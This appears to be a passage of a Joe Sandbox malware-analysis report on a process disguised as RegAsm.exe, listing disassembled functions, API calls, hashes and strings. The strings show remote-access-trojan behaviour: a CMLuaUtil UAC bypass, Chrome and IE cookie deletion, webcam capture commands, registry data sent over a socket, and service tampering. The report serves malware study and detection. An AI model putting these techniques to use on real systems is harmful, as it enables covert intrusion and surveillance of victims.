                      • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                      • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                      • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: __freea$__alloca_probe_16_free
                      • String ID: a/p$am/pm$zD
                      • API String ID: 2936374016-2723203690
                      • Opcode ID: 582b27bd1da2528f23ecf4cf811f425633019422103e053086a59298c2d48650
                      • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                      • Opcode Fuzzy Hash: 582b27bd1da2528f23ecf4cf811f425633019422103e053086a59298c2d48650
                      • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                      APIs
                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Enum$InfoQueryValue
                      • String ID: [regsplt]$xUG$TG
                      • API String ID: 3554306468-1165877943
                      • Opcode ID: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                      • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                      • Opcode Fuzzy Hash: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                      • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                      APIs
                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                      • __fassign.LIBCMT ref: 0044B479
                      • __fassign.LIBCMT ref: 0044B494
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                      • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID:
                      • API String ID: 1324828854-0
                      • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                      • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                      • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                      • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                      APIs
                      • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                        • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                        • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEnumInfoOpenQuerysend
                      • String ID: xUG$NG$NG$TG
                      • API String ID: 3114080316-2811732169
                      • Opcode ID: 20a9791a6fa1a9877af26dbf744c62984f092be79299f3eccd91bc71db94b2c8
                      • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                      • Opcode Fuzzy Hash: 20a9791a6fa1a9877af26dbf744c62984f092be79299f3eccd91bc71db94b2c8
                      • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                      APIs
                        • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                        • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                        • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                        • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                      • _wcslen.LIBCMT ref: 0041B763
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                      • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                      • API String ID: 3286818993-122982132
                      • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                      • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                      • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                      • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                      APIs
                        • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                        • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                        • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                      • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                      • API String ID: 1133728706-4073444585
                      • Opcode ID: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                      • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                      • Opcode Fuzzy Hash: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                      • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b15328f38de36e2236e67be376e02f2a3afc52644fcc3b23babb247561bddb00
                      • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                      • Opcode Fuzzy Hash: b15328f38de36e2236e67be376e02f2a3afc52644fcc3b23babb247561bddb00
                      • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                      APIs
                        • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                      • _free.LIBCMT ref: 00450F48
                        • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                      • _free.LIBCMT ref: 00450F53
                      • _free.LIBCMT ref: 00450F5E
                      • _free.LIBCMT ref: 00450FB2
                      • _free.LIBCMT ref: 00450FBD
                      • _free.LIBCMT ref: 00450FC8
                      • _free.LIBCMT ref: 00450FD3
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                      • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                      • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                      APIs
                        • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                      • _free.LIBCMT ref: 100092AB
                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                      • _free.LIBCMT ref: 100092B6
                      • _free.LIBCMT ref: 100092C1
                      • _free.LIBCMT ref: 10009315
                      • _free.LIBCMT ref: 10009320
                      • _free.LIBCMT ref: 1000932B
                      • _free.LIBCMT ref: 10009336
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                      • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                      • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                      • int.LIBCPMT ref: 00411183
                        • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                        • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                      • std::_Facet_Register.LIBCPMT ref: 004111C3
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                      • String ID: (mG
                      • API String ID: 2536120697-4059303827
                      • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                      • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                      • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                      • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                      APIs
                      • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                      • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                      • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                      • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                      • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                      APIs
                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004075D0
                        • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                        • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                      • CoUninitialize.OLE32 ref: 00407629
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: InitializeObjectUninitialize_wcslen
                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                      • API String ID: 3851391207-1839356972
                      • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                      • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                      • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                      • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                      APIs
                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                      • GetLastError.KERNEL32 ref: 0040BAE7
                      Strings
                      • [Chrome Cookies not found], xrefs: 0040BB01
                      • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                      • UserProfile, xrefs: 0040BAAD
                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: DeleteErrorFileLast
                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      • API String ID: 2018770650-304995407
                      • Opcode ID: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                      • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                      • Opcode Fuzzy Hash: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                      • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                      • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: 6/$CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-3237651980
                      • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                      • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                      • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                      • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                      APIs
                      • __allrem.LIBCMT ref: 0043AC69
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                      • __allrem.LIBCMT ref: 0043AC9C
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                      • __allrem.LIBCMT ref: 0043ACD1
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1992179935-0
                      • Opcode ID: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                      • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                      • Opcode Fuzzy Hash: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                      • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                      APIs
                      • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                        • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: H_prologSleep
                      • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                      • API String ID: 3469354165-3054508432
                      • Opcode ID: 029587eb0fe69ed895cddc6fea320288e95fd1511667b99adeedd0e3e0781473
                      • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                      • Opcode Fuzzy Hash: 029587eb0fe69ed895cddc6fea320288e95fd1511667b99adeedd0e3e0781473
                      • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: __cftoe
                      • String ID:
                      • API String ID: 4189289331-0
                      • Opcode ID: 3a22baf89f7933cc554f06987bfa64c005347e38fd474961e410d74fa9d433f0
                      • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                      • Opcode Fuzzy Hash: 3a22baf89f7933cc554f06987bfa64c005347e38fd474961e410d74fa9d433f0
                      • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                      APIs
                      • _strlen.LIBCMT ref: 10001607
                      • _strcat.LIBCMT ref: 1000161D
                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                      • lstrcatW.KERNEL32(?,?), ref: 1000165A
                      • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                      • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: lstrcatlstrlen$_strcat_strlen
                      • String ID:
                      • API String ID: 1922816806-0
                      • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                      • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                      • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                      • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                      APIs
                      • lstrcatW.KERNEL32(?,?), ref: 10001038
                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: lstrlen$AttributesFilelstrcat
                      • String ID:
                      • API String ID: 3594823470-0
                      • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                      • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                      • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                      • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
